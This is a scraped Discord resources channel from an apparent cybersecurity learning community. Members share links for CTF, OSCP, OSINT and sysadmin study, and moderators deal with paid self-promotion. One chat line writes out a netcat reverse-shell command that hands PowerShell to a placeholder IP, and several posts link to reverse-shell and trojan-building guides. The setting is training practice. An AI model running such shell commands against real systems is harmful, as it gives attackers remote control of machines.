oh damn i had no idea that tryhackme would have anything related to this, thanks @shut ferry
#resources
haughty dirge
shut ferry
No problem!
night ether
short guide on setting up apache virtual hosts, https://www.jake-ruston.com/posts/apache-virtual-hosts.php
odd quest
Thanks for this, I've been secretly wanting a guide but tried it myself yet
night ether
:D let me know how it is 🥺
spiral zodiac
@night ether I was actually looking for something like this too, thank you!
night ether
you're welcome :D
cloud brook
@night ether dang so popular
night ether
heck yeah 😌
shut ferry
I didn't know I was looking for this- but I am now
tepid patio
short guide on setting up apache virtual hosts, https://www.jake-ruston.com/posts/apache-virtual-hosts.html
@night ether i dont know what this is but suddenly i want to read it
topaz gulch
It's a useful trick to know
cloud brook
@shut ferry i did know I was looking for this, and I'm glad I found it
night ether
thank you guys it means a lot 🥺
civic halo
My website is still in development
It's gonna have some flags on it
(hosted on my own servers)
night ether
love u
night holly
love u
@night ether keep your greasy paws off him 🤤
night ether
@night ether keep your greasy paws off him 🤤
@night holly
honest dock
night ether
learn how to create a simple systemd service within linux to ensure an application will always be running, could be useful if you decide to create a ctf machine and want a python, php, nodejs etc. webserver :)
https://www.jake-ruston.com/posts/linux-system-services.php
are there any other topics that could be useful for box creation / sysadmin / networking that people wanna see covered 😌
steady lotus
shut ferry
It's not the actual certifications, just training courses.
keen blade
plush spruce
@steady lotus Nothing there
steady lotus
@steady lotus Nothing there
@plush spruce where
Wait
Wtf did just happen
Here's a mirror
real knot
can anyone share any resources i need to learn scripting in python. Like redirection out to a file, interacting with web pages via request library
shut ferry
If you haven't already,
https://tryhackme.com/room/scripting
real knot
https://blog.tryhackme.com/python-for-beginners/
@tepid patio I know the basics for looking to write small scripts now
tepid patio
scripting room is for u
or automate thew boring stuff
which is just a book on writing scripts to automating boring stuff
real knot
thank you will check it out i really appreciate the help
shut ferry
https://www.thepythoncode.com/article/create-reverse-shell-python
This might also be kinda interesting too
ebon valve
Hey! Please avoid linking self-promotional paid content here (directed towards Naga Sai)
odd quest
Might as well use free resources for learning the basics, there's enough out there
ebon valve
Also, you linked directly to the checkout haha
odd quest
Ok now I don't think it's clear who this applied to
topaz gulch
@flint scroll ^^
flint scroll
@ebon valve thinkific
teachable
defaultly puts checkout page
odd quest
Instead of using this content that advertises a paid course, I recommend some actually free content
flint scroll
you can see this video freely
🙂
odd quest
flint scroll
video doesnot advertise paid course
description does
ebon valve
Yeah that's ok
Since the video isn't serving mainly as an advertisement and does have educational content that's fine to post
odd quest
I'll stand by sololearn which teaches it all for free
flint scroll
@odd quest uguys dont let small guys promote
but if cybermentor posted a course on udemy
u guys promote
lol
odd quest
That's different
flint scroll
its the same
flint scroll
thanks for that 🙂
white pivot
https://blog.tryhackme.com/python-for-beginners/
@tepid patio Holy crap, I forgot about this, thanks for sharing it, reminded me of the early times when blog was first introduced.
haughty dirge
very cool guide, you just have click on the certificate, and it will send you to the website of the certification !
raw marsh
Ice Room, Task 7 is great. I decided to learn a bit more about msfvenom, which has been fun. In a CTF or some other environment where you can't phish someone to download the exploit or setup a website to have them browse to it, how do you deliver it without metasploit? Any good reference material on this? To get an intro to exploits without metasploit, I liked both https://medium.com/@hakluke/haklukes-guide-to-hacking-without-metasploit-1bbbe3d14f90 and https://medium.com/@PenTest_duck/offensive-msfvenom-from-generating-shellcode-to-creating-trojans-4be10179bb86.
haughty dirge
amazing tool for BugBounty of web apps !!!
docker dowload for the tool https://hub.docker.com/r/yogeshojha/rengine
tepid patio
Throwback to one of my fave articles https://medium.com/hackernoon/im-harvesting-credit-card-numbers-and-passwords-from-your-site-here-s-how-9a8cb347c5b5
cloud brook
It’d be nice if the official write up for a room submission could be either an image or pdf or something other than a link
topaz gulch
An... image?
odd quest
It can be, if you host that file @cloud brook
topaz gulch
It can be a PDF (although they're annoying as heck for the testers) -- you just have to host it yourself
odd quest
I'd rather a PDF than a video
topaz gulch
Agreed on that
Clarification. PDFs in the browser are fine
(i.e. Google Drive or equivalent)
PDFs you have to download are annoying
Videos are just a pain in the arse
cloud brook
Noted. Also I meant to put this in feedback sorry
ebon valve
I'll have a video up on room creation soon: https://www.youtube.com/channel/UC0R_-7yQPoGpkPR9ITzDFFQ/playlists?disable_polymer=1
azure widget
you mean dark is active on his video platforms wow who could've known
ebon valve
ah man, now I've gotta be active
sturdy shell
ebon valve
I'll post videos here as they go up of course
sturdy shell
Will you pay me $5 to basically scribe everything
not even in £
jkjk
It's only because I'm bricking that part on Saturday
azure widget
Ill google translate so you can have different language subtitles $5 for each subtitle
sturdy shell
Okay deal
Cry you can deal with english
I'll deal with chav/roadman english
Muirl can do scottish which ain't anywhere near either of the two
youtube auto caption might be more accurate
topaz gulch
Dark, permission to use sweary word? 🥺
topaz gulch
Danke ♥️
Actually, I'll do one better and just use sweary emoji
topaz gulch
smh 🤣
azure widget
https://github.com/ReverendThing/Carnivore
https://github.com/ekiojp/circo
https://github.com/utkusen/jeopardize
https://github.com/JPCERTCC/MalConfScan-with-Cuckoo
https://github.com/MobSF/Mobile-Security-Framework-MobSF
https://github.com/Viralmaniar/Phirautee
https://github.com/GoSecure/pyrdp
There will be workshops at Defcon for all of the projects that I just posted as well as more https://defcon.org/html/defcon-safemode/dc-safemode-demolabs.html
crude isle
@azure widget Do you have resources of learning and practice RE?
azure widget
no
crude isle
Hi @sturdy shell , thanks
for the response
The book that i was reading of RE is not worth the value the teaching is to bad and doesnt teach you how to do a static analysis in a correct way
edgy plank
Danke ♥️
Actually, I'll do one better and just use sweary emoji
Seems like u are German people
rustic zephyr
Hey , does anybody know about some really cool podcasts for cybersecurity stuff? Or blogs
daring hull
This Week in Tech
Black Hills InfoSec
DeviantOllam's talks on YT (normally recorded from Wild West Hackin' Fest or DEFCON)
Privacy, Security, and OSINT
rustic zephyr
Thanks bro!
tepid patio
the bellingcat podcast for OSINT
ebon valve
night ether
if anyone was looking into doing some cloud stuff :)
https://twitter.com/mcohmi/status/1289339614059085829
flint scroll
my course pls give review if u watch video
https://youtu.be/EVKq2UdoefE
gritty barn
was the writeup approved?
@topaz pier
it seems like not, could you please remove it for me until the creator approves it?
topaz pier
already removed
gritty barn
by a mod, yes
pulsar seal
guys can somone help me with some buffer overflow? (sotty if it is the wrong chat)
shut ferry
Probably #room-help if it's related to a THM room, or #general if it's just about something in general
tepid patio
🥳 Ciphey 5.0.0 is released after 2 months of very hard work. Key features include: ```diff
- Recursive decryptions using custom built search algorithm(s)
- Regex support
- Better English Language Checker
- New EZChecker which combines the best of all checkers, including REGEX for flags.
- New decryption methods
- Much, much faster
- No more Tensorflow, now custom built AI is my best friend
- New easy to use interface for adding new crackers, decoders and checkers
``` https://github.com/Ciphey/Cipheypython3 -m pip install ciphey --upgrade
sturdy shell
RustScan is now available via a single docker command (image is 698mb where the builder for the .deb was 2.9gb not including dependencies)
a) if you don't want rust/cargo on your pc but want the same, but reduced size rustscan
docker run -it cmnatic/rustscan:debian-buster rustscan <ip address>
it'll take a few mins to build at first but that's rust being rust. pass arguments as per the README like normal
tepid patio
^^ you also likely won't experience OS limits using the docker version :) 💞✨
azure widget
like wireshark but extracts usernames and passwords as well kerb tickets and ntlm hashes
sturdy shell
Oooooh that sounds juicy as
hearty anchor
guy i need some help,
where do you think can i learn memory dump analysis cause i am facing some issues with it
which according to me is because i don't understand memory dump forensics as a whole
when i say that i mean is that ik that we use volatility for memory dump analysis and i know how to use it and the basic stuff but then
i can use a dlllist command even though i don't know what is a dll
i can look for handles even though i don't know shit what handles are
so the issue is concepts for a specific kind of analysis which i need to understand
i need to understand the shit that i am doing
so is there anything you'd say i can do to work on them
or rather specifically in case of memory dump analysis
night ether
short guide on setting up smb shares :)
https://www.jake-ruston.com/posts/linux-samba-shares.php
odd quest
@hearty anchor That sounds like you need to learn about how Windows works before you can analyse Windows memory dumps
what is a <thingGoesHere> windows is a good query to start with
hearty anchor
@odd quest so where can i find that as whole resource sort of thing cause googling every new word i come across isn't very time effective so i was looking for some site or any resource where i can go and study how windows works
odd quest
You can probably find a course on it, but googling new concepts is kinda mandatory
hearty anchor
hmm k, thanks
white pivot
@hearty anchor The Art of Memory Forensics
hearty anchor
@white pivot thanks i got its pdf, i'll get started with it
white pivot
Have fun
lethal zephyr
@hearty anchor If you want to start with memory forensics and even gain good knowledge, try this out
hearty anchor
yaa i've seen this one before but thanks @lethal zephyr
shut ferry
Does anybody have any good resources for learning SEO? I’ve got a personal project which I’d like to develop alongside my personal blog but I don’t know a lot about SEO.
sturdy shell
@tepid patio
tepid patio
Does anybody have any good resources for learning SEO? I’ve got a personal project which I’d like to develop alongside my personal blog but I don’t know a lot about SEO.
@shut ferry i have my personal notes :)))
thanks for the tag
and
brian dean is the best for SEO imo
For tools, Ahrefs is literally the best in the business by a long shot 😛 https://ahrefs.com
shut ferry
That’s awesome. I really appreciate it. Will have a read up on the resources you’ve linked
odd quest
@lone crane #thm-community-media
lone crane
sorry..
odd quest
@lone crane Also, do not post writeups until they have been accepted on the room
viral dawn
craggy onyx
Attack Detection Fundamentals: Improve how you use the detection techniques in your existing enterprise stack and get to grips with some you’ve probably not heard of. https://www.f-secure.com/en/consulting/events/attack-detection-fundamentals-workshops
azure widget
The biggest cybersecurity resource is coming in 2 days on august 6th defcon starts until the 9th they will have some pretty impressive talks, demos, villages, exams, as well as private events. There will be 31 different villages all with different talks as well as events check it out if you dont already know about it. It is free and all online https://defcon.org/html/defcon-safemode/dc-safemode-schedule.html
craggy onyx
Jai Minton's DFIR Cheatsheet: https://www.jaiminton.com/cheatsheet/DFIR/
spiral zodiac
azure widget
Red Team Village is holding free 2-4 hour workshops, free 30 minute stations as well as their main talks https://redteamvillage.io/training.html
unborn gust
Red Team Village is holding free 2-4 hour workshops, free 30 minute stations as well as their main talks https://redteamvillage.io/training.html
@azure widget I strongly recommend anyone that is interested in bug bounties to check out Jeff Foley's talk and for sure make sure to check Jason Haddix's talk.
cobalt trout
I need the best resource for Information Gathering
gritty barn
That is a very generic questions and for that you get a very generic answer: https://google.com
azure widget
@cobalt trout this my secret sauce
https://osintframework.com
cobalt trout
@azure widget Yea. seems good. I need at the beginning to provide them with a document regarding assets and techniques for doing passive footprinting
azure widget
If you can’t find what you need in that framework you shouldn’t be osinting
cobalt trout
Hey guys, as I have to create a detailed document about Passive Footprinting and Recon, I have to list the best assets and techiniques for that thing.
What do you think about this tutorial and its recommended tools?
https://securitytrails.com/blog/osint-tools
flint scroll
dont ban me for that , just give warning if its violated
spiral zodiac
No self-promotion of paid content in #resources.
spiral zodiac
@ebon valve
ebon valve
Let's not promote paid content like that
It's clear that as this is self promotion you're doing that as advertising
Free videos are fine but explicit advertisement which is abundantly clear that is self-promotion for monetary gain is not ok
flint scroll
that link contains free preview video
ebon valve
If you have free YouTube videos you want to post every once in a while that's more than okay
...
A free preview video in an otherwise blatant ad
Not to mention, you're not otherwise active here. It's clear the THM discord for you is an advertising space
Consider this a final warning
flint scroll
then go and promote cybermental's course
even though we can get that from google
once see that preview and say
just dont ignore any one's hardwork
arctic mist
I can tell you for a fact that TCM's courses are of quality (which none of us know if yours are)
ebon valve
Banned for self-promotion with a clear purpose of monetary gain rather than just a simple YouTube video
And arguing with staff when provided both clear guidelines and a chance for actually posting content
tribal gull
welp, i'm expecting another video about thm from him 👀
arctic mist
fair enough lol
arctic mist
James likely
topaz gulch
(Dark, officially)
odd quest
I think Dark actually
ebon valve
Yep
I had stepped in previously and clearly explained the rules and what he was allowed to post
ebon valve
also, if someone who is very well-known in the community like Tib's or TCM posts their course that is very different
topaz gulch
Including in the message that you would like to be warned rather than banned is a clear indicator that you know it's wrong 🤷♂️
also, if someone who is very well-known in the community like Tib's or TCM posts their course that is very different
To be fair, that probably also shouldn't be being dumped in resources unless it's for one of their big "get it free for a day" promotions. Just to keep it really fair.
Although promoting it elsewhere, given their reputation, can't really be seen as an issue -- especially given their usage of the site
queen wyvern
So that means I can promote stuff
ebon valve
I mean if you contribute and actually give back to community, hell yeah you can post free youtube videos
queen wyvern
I try my best 
and I don't actually want to promote myself or anybody
azure widget
cobalt trout
Hey guys, as I have to create a detailed document about
Passive Footprinting and Recon, I have to list the best assets and techiniques for that thing.
What do you think about this tutorial and its recommended tools?
https://securitytrails.com/blog/osint-tools
@cobalt trout Someone?
arctic mist
@cobalt trout this isnt necessarily the best place to recieve feedback on articles. Plus, a lot of those aren't even OSINT tools, nmap is an active scanning tool so it shouldn't be on there because the results aren't open to the public (which is basically a requirement to be an osint tool)
cobalt trout
@arctic mist Can you recommend on something that would be proper?
azure widget
@cobalt trout I would suggest not writing a blog on the “best” osint tools if you don’t even know of any osint tools
odd quest
To me, it sounds like they need to write a school paper
tepid patio
I would suggest "haveibeenpwned" is not a tool you would want to use to perform OSINT on someone else. Sure, you can find out if they were breached -- but it literally emails the person you're trying to get info on too :L
ebon valve
For anyone who wants to learn how to solder, this is a great place to start^
Nice and inexpensive practice piece
odd quest
It also looks pretty damn cool if you already can solder. Not 100% sure how shipping outside the US works tho
queen wyvern
wait this is only 1$ 🤨
shrewd ginkgo
I can't select anything but US during checkout so I guess it's US only
odd quest
They recommend using a forwarding service
shrewd ginkgo
sadnootnoises
queen wyvern
What is a forwarding service ? Drop services ?
shut ferry
$1 but they probably get you back on the shipping costs 
$20 soldering kit that you can order with it too
azure widget
no it’s a free badge they do it every year the 1$ is only to offset shipping costs
odd quest
DEF CON is officially uncancelled! For our virtual booth, we're offering 35% off everything at https://nostarch.com/ with code UNDEFCON now through August 9.
Nostarch are having a sale for defcon
shut ferry
If anybody's interested in Blue Team work and the tools used, the Blue Team Village is starting their talk right now https://www.twitch.tv/BlueTeamVillage
prisma bison
Yes, s
night ether
is it really laggy for anyone else?
gritty barn
elearn has a sale currently
balmy merlin
For those that come from a different background and are looking to get into cyber security here is a video by hak5 with different people from different backgrounds and how they got into cyber security and how you can make the switch
cobalt trout
I have to create a document on Passive Footprinting and Recon - description, assets, techniques, useful tools.
Can you please give me some good resources for that? Especially for the best passive tools.
Thanks.
azure widget
@cobalt trout you have asked this question 3 times if not more in the past 24 hours please don’t post multiple we have given you resources please either use them or do your own research don’t keep spamming this channel
cobalt trout
👍
odd quest
Also, we're probably not going to do your homework for you
cloud brook
probably
gritty barn
https://www.youtube.com/watch?v=EJn2-hdxxWg&feature=youtu.be it's live if anyone is interested
wicked kestrel
i think burp is just more recommended
silent wing
I have to buy pro naah. I just passed out of college.
There's a room on zap
@odd quest I ll check it out.
winter raven
any reference where i can learn all about AD attacks and Defense totally at beginers level !! Need help
odd quest
TryHackMe has some rooms on it. How much have you learnt about AD so far?
winter raven
.Initial Attack vectors,
SMB relay attacks
IPV6 attacks but i still dont feel confient abt them
so need a good resource to learn from beginning again
@odd quest So do i need to have the subs to get to the room
odd quest
Some.
winter raven
@odd quest any free resources you can direct me to
odd quest
I don't have any to hand
winter raven
@odd quest alright thank you
craggy onyx
@winter raven https://adsecurity.org/?page_id=4031
stark saddle
Hello. maybe i am in wrong discord room :
I try Metasploit room : https://tryhackme.com/room/rpmetasploit . Part 1 says : "The virtual machine used in this room (Ice), a worksheet version of this room, and the subsequent answer key can be downloaded for offline usage from https://darkstar7471.com/resources.html" . But this link doesnot answer for me
odd quest
stark saddle
can someone try the ressource link please ?
stark saddle
@odd quest You saw it. this is good thanks man
azure widget
https://archive.ooo/
Order of the Overflow Defcon CTF archives
little parcel
Do you have anything about C2? (e.g. Theory, Setup, usage)
sturdy shell
Anyone got any good patch panelling documentation resources? i.e. marking what ports are for vlans, goes to what cabs etc on spreadsheets for server racks please?
would save me an absolute tonne
I made a really useful excel template but I cna't find it
pls
winter raven
@winter raven https://adsecurity.org/?page_id=4031
@craggy onyx thankyou
queen wyvern
@sturdy shell Did you still not find anything good on bash scripting
Sorry for the ping 😦
honest dock
@queen wyvern https://learnxinyminutes.com/docs/bash/
queen wyvern
That's some hot stuff, but not what I was looking for
night ether
good video on proxychains with a fun little challenge at the end :)
https://www.youtube.com/watch?v=qsA8zREbt6g
shut ferry
azure widget
tepid patio
I wrote a blog post on making hacking accessible 🙂 https://bees.substack.com/p/making-hacking-accessible
silent vine
anyone got a big list of different types of hash formats? cant seem to find a good one online
thick zodiac
anyone got a big list of different types of hash formats? cant seem to find a good one online
@silent vine https://hashcat.net/wiki/doku.php?id=example_hashes
is this what u mean?
silent vine
yes perfect thank you :)
spark hedge
cloud brook
What’s updog?
shut ferry
A user in #bookclub recommended I drop a resource in here that I found for learning x86 ASM. 🙂 https://www.youtube.com/playlist?list=PL038BE01D3BAEFDB0 Hopefully some of you find it useful.
tepid patio
New version of ciphey 🙂 ```
- Added Atbash cipher
- Added Standard Galactic Translation (Minecraft enchanting table)
- Added X&Y (so if you have a file with only 2 chars, X and Y, it will convert it to binary``` https://github.com/Ciphey/Ciphey
tepid patio
This seems v/ fun, the description makes it sound like what new junior pentesters get wrong? Haven't seen it yet https://www.youtube.com/watch?v=PtCk3OMeV5g
azure widget
its basically college kids competing against a professional red team trying to defend a network its basically just stories about what they did. The talk was really good and pretty funny
shut ferry
Yeah, I really enjoyed this one
You get to see what the extent of a red teamer can do when they don't have much restrictions against actually screwing around with the blue team
They even do things like actually physically walk into the room and swap laptops and such, which is pretty hilarious
jaunty pulsar
This seems v/ fun, the description makes it sound like what new junior pentesters get wrong? Haven't seen it yet https://www.youtube.com/watch?v=PtCk3OMeV5g
@tepid patio I'll give it a try
spiral zodiac
topaz gulch
Someone's doing an 4ndr34z/theart42 box are they? 👀
topaz gulch
😁
lament jungle
prisma bison
jaunty pulsar
https://github.com/H0j3n/EazyPeazy
@modern abyss work in progress? come .md empty
faint prism
Is anyone here familiar with terminal settings, specifically geometry, and how it interacts with various binaries
proven bramble
I wrote up some tips for those worried or stressing about their OSCP exam day. https://medium.com/@j.w.helle/10-tips-for-success-on-your-oscp-exam-413db4e2ed1b
modern abyss
@jaunty pulsar yea it still in progress and i will update it more :)
jaunty pulsar
@jaunty pulsar yea it still in progress and i will update it more :)
@modern abyss i tried tou use your python script but is not working
vapid trail
vast patrol
odd quest
@topaz gulch https://github.com/sshuttle/sshuttle
soooo much faster than proxychains, no root required either
topaz gulch
🤣
odd quest
It's tunelling web traffic just fine
spark hedge
https://github.com/xct/xc
xct is a 
queen wyvern
A good resource for intership resumes : https://github.com/codebytere/so-you-want-an-internship
sturdy shell
Since this got brought up in note taking convo, here's what I used to learn LaTeX for my 3rd year of University:
-
Learn the absolute basics to get started, also very good to keep as a cheatsheet when writing https://www.cs.princeton.edu/courses/archive/spr10/cos433/Latex/latex-guide.pdf
-
Learn how to make a good template, or find a suitable one for you, it allows you to really departmentalise your writing. Have a folder for the images, templates often make a seperate
.texfile per section of your paper, where it's just imported/referenced afterwhich in the main.texhttps://guides.nyu.edu/LaTeX/templates -
THIS PLAYLIST https://www.youtube.com/playlist?list=PLDD406480D35CE390
-
Make a free account on Overleaf, an in-browser LaTeX editor. Their documentation (https://www.overleaf.com/learn/latex/Main_Page) is absolutely incredible. Especially the "Learn LaTeX in 30 minutes" (https://www.overleaf.com/learn/latex/Learn_LaTeX_in_30_minutes). Genuinely can't overstate how good Overleaf is. Tonnes of templates too so you can have a look at how others design their docs. If your University needs/uses LaTeX, they'll have a template - look/ask around.
-
LaTeX is old af and is the hardstuck uncle of the family, theres tonnes of free resources from late 2000's that will still be relevant to you today
-
Look into plugins for your referencing and/or stylizing of chapters, pages, etc later. Get your thoughts to paper whilst making placeholder for your references - give it that true LaTeX feel later.
-
Honestly just bite the bullet and get started, it's awful to approach but you'll really come to learn to love it esp. for academia (and so will your lecturers). Googling your way around with overleaf docs is the best way to get things done
-
TIP: Understand the different document types, there's a huge difference in what they will allow and how they will end up looking. Writing scientific? Pick scientific.
-
TIP: Version control v frequently, it'll save your bacon.
civic halo
Pin dis
sturdy shell
Since this got brought up in note taking convo, here's what I used to learn LaTe...
cc @topaz gulch (:
Have on at it and get converted today
faint sluice
I've been avoiding LaTeX for 20+ years... 🙂
forest pecan
Used for our new browser-based machines, thought I'd throw it in here too. Simple & clean desktop background.
prime mantle
@sturdy shell Been looking at LaTeX tutorials for an hour now and it's awesome. FINALLY I know how to do that formatting which I couldn't do in msword.
Also, I think, this video is way more latest and helps setup things way easier for 2020.
Might wanna add it to your huge para
(Video is not mine. I just saw it while looking for resources on LaTeX)
https://youtu.be/DRb1XxYvJi0
tranquil shuttle
Hi, I made a list of resources and notes from Tryhackme ,eJPT, PEH course from The Cyber Mentor and wanted to share it with you guys. Any feedback or if you wanna help contribute to the notes would be very much appreciated
arctic mist
jovial notch
faint prism
@Zoijja LAtek is like the ultimate in self generating network documentation ... you can inherit stuff between documents
update a source element, and bam all downstream is fixed
You use it with a tool like uhhh "Docear" and your network maps are also instantly fixed
gritty barn
you talking about latex?
jaunty pulsar
Hi, I made a list of resources and notes from Tryhackme ,eJPT, PEH course from The Cyber Mentor and wanted to share it with you guys. Any feedback or if you wanna help contribute to the notes would be very much appreciated
@tranquil shuttle awesome bro
The thing i dont like from notion (even if i use rigth now) is that it doesnt have colors to make words notable
tranquil shuttle
@jaunty pulsar yeaah you can’t highlight them i think but it i if i am not wrong you can still change the colour
jaunty pulsar
@jaunty pulsar yeaah you can’t highlight them i think but it i if i am not wrong you can still change the colour
@tranquil shuttle yeah but those color are very weak
It could work with a white blackground yeah, but i dont like white background so in my specific case i dont really like
tranquil shuttle
ohhh okaay that makes sensee
haughty dirge
free python and linux for network Engineers for free on the video https://www.youtube.com/watch?v=Nj-yeK1nU8o
skip to 2:30 and 3:00 there are two different codes
fringe spire
Not everyone here is a fan of CEH but if someone wants to take the cert it will be 50% for sometime. So take it when yiu have the chance.
queen wyvern
Imagine paying 500$ for CEH
fringe spire
Cert is a cert.. it maybe not useful in terms of knowledge but it's (pretty) well known in the industry and clearing HR so people are taking it just for that. so if you can save money for that then why not? if you don't wanna take it then don't 🤷♂️
fringe spire
at the end of the day it's personal choice. Take it if someone wants it.
arctic mist
@fringe spire do you have any more details on that? I'm kinda intersted in taking LPT to see if its remotely worth it
fringe spire
I just got the email i can forward you that?
arctic mist
yeh, ill dm you my email
odd quest
spooks@chikabestgirl.local
gritty barn
Got the same email if anyone interested
arctic mist
i must be opted out
gritty barn
Also don't forget to ask about student discount if you are a student. They don't check tho
arctic mist
i still have access to my student email(s) luckily
gritty barn
They don't check for that
I think I got extra 10% off on CEH when I got it
Get the CCISO for USD 1299 and get all other courses at 50%
discount (only on online training packages).
Online training packages include:
· One-year access to the official e-courseware
· 6 months access to EC-Council's official Online lab environment(iLabs)
· Exam Voucher
· One-year access to training videos
Choose from the following award winning programs for a 50% discount:
• Certified Ethical Hacker (CEH)
• Computer Hacking Forensic Investigator (CHFI)
• Certified Security Analyst (ECSA)
• Certified Network Defender (CND)
• EC-Council Disaster Recovery Professional (EDRP)
• Ethical Hacking Core Skills (EHCS)
• Certified Blockchain Professional (CBP)
• Python Security Microdegree
• Incident Handler (ECIH)
• Secure Computer User (CSCU)
• Threat Intelligence Analyst (CTIA)
• Advanced Penetration Testing (APT)
• Secure Programming (CASE Java/.NET)
• Certified SOC Analyst (CSA)
• Encryption (ECES)
• Penetration Tester Master (LPT)
Additional Offers:
· CodeRed Pro at USD 149
· CEH Practical at USD 149
· ECSA Practical at USD 199
*Free Exam Prep on purchase of CEH & CND
Remember, only orders placed on August 21 to August 31, 2020 are eligible for the above-mentioned discount offer! Reply to this email for more information about payment options and any questions you may have. I look forward to working with you!
Regards,
Fasi Khan
Training Consultant
EC-Council
Email: Iclasstraining1@eccouncil.org```Read dates
arctic mist
$150 for the practical is kinda actually worth it
seeing i forked out 1,000 for the normal thing
gritty barn
Glad you found it useful
arctic mist
actually, I'd be willing to say its probably more than worth it seeing it'll get you into public sector state side a lot easier
fringe spire
you need CEH before CEH practical, right?
maiden arrow
does someone has some information about azure sentinel?
queen wyvern
"some" 😕
shut ferry
OSCP Prep:
A beginners guide:
https://forum.hackthebox.eu/discussion/1730/a-script-kiddie-s-guide-to-passing-oscp-on-your-first-attempt
OSCP-like machines:
https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=0
More OSCP-like machines:
https://www.abatchy.com/2017/02/oscp-like-vulnhub-vms
OSCP Prep guide:
https://niiconsulting.com/checkmate/2017/06/a-detail-guide-on-oscp-preparation-from-newbie-to-oscp/
Repo with notes: (please don’t just use these notes. Make your own notes out of these. You won’t learn from just copying other’s notes)
https://github.com/rewardone/OSCPRepo
OSCP & PWK FAQ:
https://www.offensive-security.com/offsec/pwk-oscp-faq/
OSCP Review:
https://medium.com/cybersecpadawan/the-long-awaited-oscp-review-5a377f103a39
OSCP Tips:
https://medium.com/cybersecpadawan/10-tips-for-success-on-your-oscp-exam-413db4e2ed1b
More OSCP-like machines:
https://i.imgur.com/JFHD139.jpg
https://i.imgur.com/iwnnZgu.png
OSCP Guide:
Part 1: https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-1-is-oscp-for-you-b57cbcce7440 (Is OSCP for you)
Part 2: https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-2-workflow-and-documentation-tips-9dd335204a48 (Workflow and Documentation)
Part 3: https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-3-practical-hacking-tips-and-tricks-c38486f5fc97 (Tips and Tricks)
Presentation about OSCP:
https://docs.google.com/presentation/d/1Xfxr_zzwzczu0aKpxgYG8MzcT8zFlAmf7U_2C73NR1M/edit#slide=id.p1
shut ferry
I will be giving more resources soon btw
tepid patio
I will be giving more resources soon btw
@shut ferry Edit your message and add more into them, instead of posting more. That way we can have a unified resource list in this channel 😄
shut ferry
Sure! :)
tepid patio
@proven bramble and TJNull have an OSCP list of things to do (boxes on multiple platforms including THM), which would be cool to add. Although I'm not sure where it is, Major should be able to help. Also!!! Major has OSCP-like boxes coming up this Friday which would be v/ nice to add too 😄
proven bramble
shut ferry
Oooo
proven bramble
Yep. I worked with Skidy to revamp the Offensive Pentesting path this week as well, so there is some new stuff in there that is more applicable.
Those as well.
shut ferry
Mind if I add them to the list?
proven bramble
Please do.
This is the image from the first article.
Shows all the writeups I did as a replacement for the PWK labs and course, since I skipped both of them.
tepid patio
@shut ferry for the images you may need to upload to IMGUR and link them or something?
shut ferry
Yeah haha. I can’t do it rn but I can do it later, is that okay?
tepid patio
Yeah haha. I can’t do it rn but I can do it later, is that okay?
@shut ferry not your boss so do whatever you want 😄 It's just cool to have one single resource 😛
fringe spire
Thanks both of you. That's really helpful (alooot) 😍
shut ferry
<3
shut ferry
Updated it again with a nice little article I found for beginners :)
shut ferry
Added a little presentation about OSCP prep thanks to @icy marsh!
azure widget
civic escarp
Page gave me a 404
raw crown
anyone know how to upgrade a powershell reverse shell like you can with a bash reverse shell?
azure widget
Upgrade it? Do you mean privilege escalation?
odd quest
I'd assume stabilise?
azure widget
I also wanna know how you got a powershell reverse shell I’ve never heard of one
modern abyss
Page gave me a 404
@civic escarp Im sorry you can go to https://github.com/H0j3n/EazyPeazy and MyTools>Ezpz Shell 🙂
topaz gulch
@raw crown only way I've found so far (including by asking more experienced friends) is by using the Powershell to activate a Meterpreter shell, which is obviously stable. Theoretically it should be possible to do with rlwrap and your stty settings in your own terminal, but I've had some.. interesting results with it. Let me know if you do find something!
spiral zodiac
@topaz gulch This might be able to help you 🤔 https://github.com/antonioCoco/ConPtyShell
topaz gulch
Ooh, that looks good mal!
Only useful for server 2019 onwards though?
Still good to know about
spiral zodiac
Yeah, maybe it only works on build >= 10.0.17763 from the looks of it
topaz gulch
I mean, at least Microsoft are TRYING to make our jobs easier, right? 😁
daring hull
Ha ha ha.
So on /r/UnixPorn, someone put together a script that changes the color of the command line the less space you have to fit it on a screen. It works with ZSH. With Kali moving to ZSH in 2020.4 and it being optional now with 2020.3, I think it might be a cool option for folks with smaller screens. I won’t use it but someone else might.
spiral zodiac
zsh is nice in my opinion, I just stick with the default theme + nerd fonts, since it's simple and just what I need, you could also use something fancy like powerline which most people prefer
gritty barn
I like powerline. It's really nice
daring hull
Yeah they were going to move to Fish but apparently it broke something that I don’t really understand.
night holly
Zsh is great
spiral zodiac
https://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/
https://soroush.secproject.com/blog/tag/unrestricted-file-upload/
arctic mist
queen wyvern
simple herald
odd quest
Ew, Kali is moving to ZSH?
@topaz gulch just because they wanted a two line prompt like Parrot has.
topaz gulch
Ew
odd quest
What does this mean 🤔
@shut ferry "parrot terminal prompt" into google will answer that
queen wyvern
Parrot's prompt is hideous
arctic mist
lies
sturdy shell
As I'm discussing/centering around VANET's (a subset of vehicular networks) for my masters dissertation it reminded me of this really good talk at Defcon this year https://youtu.be/L9UUD3a7xP4
Really interesting talk, it's a bit hard with the accents & sound levels but so is every other talk this year
It's a bit slow to pickup but the theory is important - it gets a lot more practical as the talk goes on
Any excuse to reference Defcon in my academic work
sturdy shell
Common ports and the services that are expected to run behind them cheatsheet. It's not indicative (i.e. a web server doens't have to run on port 80, it can run on whatever) but it's still pretty handy especially for studying certs like CPSA as it was brought up in #general https://packetlife.net/media/library/23/common-ports.pdf
raw crown
@topaz gulch i will have to play with metasploit still not super comfortable with it. You're right about stty, i gave it a shot earlier couldn't get it to work right either
topaz gulch
Oh, definitely, meterpreter is the way to go -- works on everything
That ConPTY looks good for Server 2019/Windows 10 though
odd quest
Meterpreter when you're not doing OSCP, at least
night holly
nc.exe <ip> 1234 -e powershell.exe /win
azure widget
Spooky did you grab an actual hta path or did you just spam your keyboard?
arctic mist
i slammed my keyboard
civic halo
Any good resources for practicing or studying Security +?
odd quest
@rain carbon Do you have the rights to share that first one?
odd quest
Yeah nope. Please remove it if you don't have the rights to distribute it to others
odd quest
Thanks
rain carbon
np
topaz gulch
@agile sluice Could I ask you to please not post those here until they've been accepted in the room? 🙂
